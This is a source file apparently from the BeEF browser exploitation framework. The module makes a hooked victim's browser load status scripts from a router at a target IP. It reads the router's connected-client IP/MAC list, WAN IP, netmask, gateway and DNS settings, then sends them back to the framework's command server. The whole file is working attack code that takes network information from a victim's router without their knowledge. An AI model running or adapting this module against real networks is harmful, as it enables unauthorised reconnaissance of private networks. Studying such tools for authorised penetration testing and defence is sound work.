//
// Copyright (c) 2006-2024Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {
  var target_ip = '<%= @target_ip %>'; 

  load_script = function(url) {
    var s = document.createElement("script");
    s.type = 'text/javascript';
    s.src  = url;
    document.body.appendChild(s);
  }

  get_info = function() {

    beef.debug(target_ip + " - gathering info...");

    var clients = Client_IP_MAC;
    var wanip   = wanlink_ipaddr();
    var netmask = wanlink_netmask();
    var gateway = wanlink_gateway();
    var dns     = wanlink_dns();

    beef.debug(target_ip + " - Clients: " + clients);
    beef.debug(target_ip + " - WAN IP: "  + wanip);
    beef.debug(target_ip + " - Gateway: " + gateway);
    beef.debug(target_ip + " - DNS: "     + dns);
    beef.debug(target_ip + " - gathering info completed");

    beef.net.send("<%= @command_url %>", <%= @command_id %>,
      "ip="       + target_ip +
      "&clients=" + clients +
      "&wanip="   + wanip   +
      "&netmask=" + netmask +
      "&gateway=" + gateway + 
      "&dns="     + dns
    );
  }

  beef.debug(target_ip + " - loading scripts...");
  load_script("http://" + target_ip + "/status.asp");
  load_script("http://" + target_ip + "/get_wan_status.asp");
  setTimeout("get_info()", 10000);

});

